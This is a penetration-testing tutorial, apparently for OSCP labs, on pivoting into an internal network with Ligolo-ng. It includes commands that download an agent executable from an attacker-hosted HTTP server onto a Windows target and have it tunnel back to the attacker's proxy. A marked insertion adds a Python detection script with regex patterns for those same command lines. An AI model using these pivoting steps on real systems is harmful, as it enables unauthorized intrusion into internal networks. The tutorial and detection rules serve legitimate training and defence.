Use Ligolo-ng to pivot into internal networks
Introduction
In the world of penetration testing, pivoting into internal networks is a crucial skill. Ligolo-ng is a versatile tool that facilitates this process by enabling attackers to tunnel through compromised systems and access internal network resources. This guide will walk you through how to set up and use Ligolo-ng to pivot into internal networks.
Prerequisites
Download the proxy for Linux, which will be run on the attacking machine, and the agent for Windows (the target machine is a Windows client), then extract both archives:
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.1/ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.1/ligolo-ng_agent_0.5.1_windows_amd64.zip
┌──(kali㉿kali)-[~]
└─$ unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
┌──(kali㉿kali)-[~]
└─$ tar -xf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
After extracting the archives, host the files via Python's http.server module:
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Transfer agent.exe to the target
Transfer agent.exe to the target Windows machine (dual-homed host):
PS C:\Users\Administrator\Desktop> iwr http://192.168.45.205:8000/agent.exe -o agent.exe
Set up a ligolo interface
On the attacking machine (e.g. Kali) create a tun interface called ligolo:
$ sudo ip tuntap add user kali mode tun ligolo
$ sudo ip link set ligolo up
Run the proxy with the -selfcert option
On Kali, run the proxy:
./proxy -selfcert -laddr 0.0.0.0:443
Connect to the proxy via the compromised host
On the target (Windows or Linux), run the agent or agent.exe:
.\agent -connect 192.168.45.236:443 -ignore-cert
Note: The IP used here points to our attacking machine (here: Kali VM).
We should get a notification on the proxy that the client has established a connection.
Select the session:
ligolo-ng » session
Show the interfaces:
ligolo-ng » ifconfig
ligolo-ng » start
[Agent : CASTLE\user@CLIENT01] » ifconfig
┌───────────────────────────────────────────────┐
│ Interface 0                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ Ethernet0                      │
│ Hardware MAC │ 00:50:56:9e:e6:b8              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.16.75.243/24               │
└──────────────┴────────────────────────────────┘
Create the required routes to the internal network
On Linux:
sudo ip route add 172.16.75.0/24 dev ligolo
On Windows:
netsh int ipv4 show interfaces
route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Establish the tunnel
Start the tunnel on the proxy:
[Agent : BEYOND\marcus@CLIENTWK1] » tunnel_start
Note: You can specify a custom tuntap via --tun iface
We can now access the 172.16.75.0/24 agent network from the proxy server.
Check if it works by pinging the internal targets.
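Seen from the defending side, the transfer and agent-launch commands above leave distinctive process-creation command lines on the pivot host. The following is an added example, not part of the original guide or the Ligolo-ng project: a small Python triage over constructed log entries. The rule names, the sample events and the assumption that the agent parses its flags with Go's standard flag package are mine.

```python
import re

# Flag names come from the agent command in this guide. Assumption: flags are
# parsed Go-style, so --flag and the one-token form -connect=host:port also work.
CONNECT = re.compile(r"^--?connect(?:=(?P<dst>\S+))?$", re.I)
IGNORE_CERT = re.compile(r"^--?ignore-cert(?:=true)?$", re.I)
HOST_PORT = re.compile(r"^[\w.-]+:\d{1,5}$")
# PowerShell fetching an .exe over cleartext HTTP, as in the transfer step.
HTTP_EXE = re.compile(r"\b(?:iwr|invoke-webrequest)\b.*?\bhttp://\S+?\.exe\b", re.I)


def findings(cmdline):
    """Return the rule names that match one process-creation command line."""
    hits, dst = [], None
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        m = CONNECT.match(tok)
        if m:
            dst = m.group("dst") or (tokens[i + 1] if i + 1 < len(tokens) else None)
    if dst and HOST_PORT.match(dst):
        # Keyed on arguments, not the image name, so a renamed binary still matches.
        hits.append("tunnel-agent-connect")
        if any(IGNORE_CERT.match(t) for t in tokens):
            hits.append("tls-verification-disabled")
    if HTTP_EXE.search(cmdline):
        hits.append("http-exe-download")
    return hits


# Constructed sample events (not real logs). The first and third command lines
# are the guide's own commands; the other three are made up for contrast.
SAMPLE_EVENTS = [
    ("CLIENT01", r".\agent -connect 192.168.45.236:443 -ignore-cert"),
    ("CLIENT01", r"C:\Users\Public\svc.exe --connect=10.0.0.5:8443 --ignore-cert"),
    ("CLIENT01", "powershell iwr http://192.168.45.205:8000/agent.exe -o agent.exe"),
    ("CLIENT02", "ssh.exe -o ConnectTimeout=5 admin@fileserver"),
    ("CLIENT02", "powershell iwr https://example.com/setup.exe -o setup.exe"),
]


def triage(events):
    """Map each flagged (host, cmdline) event to the rules it matched."""
    return {ev: findings(ev[1]) for ev in events if findings(ev[1])}


if __name__ == "__main__":
    for (host, cmd), rules in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {','.join(rules)} <- {cmd}")
```

The same patterns can be carried over to a SIEM query on process-creation events; on the network side, the matching signal is a long-lived outbound TLS session from a workstation to a host presenting a self-signed certificate.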
Clean Up
Check which routes exist on the machine:
$ ip route
172.16.235.0/24 dev ligolo scope link linkdown
Then, delete the existing route:
$ sudo ip route del 172.16.235.0/24 dev ligolo scope link
To delete the ligolo tun interface:
┌──(kali㉿kali)-[~/oscp/relia]
└─$ sudo ip link del ligolo
If you need more information, check out the documentation.
Conclusion
Mastering the use of Ligolo-ng for pivoting into internal networks is an invaluable skill for the OSCP. By understanding how to set up and utilize this tool, you can navigate and exploit internal networks with greater precision and effectiveness. Incorporating Ligolo-ng into your arsenal will significantly enhance your ability to uncover and leverage hidden internal network resources.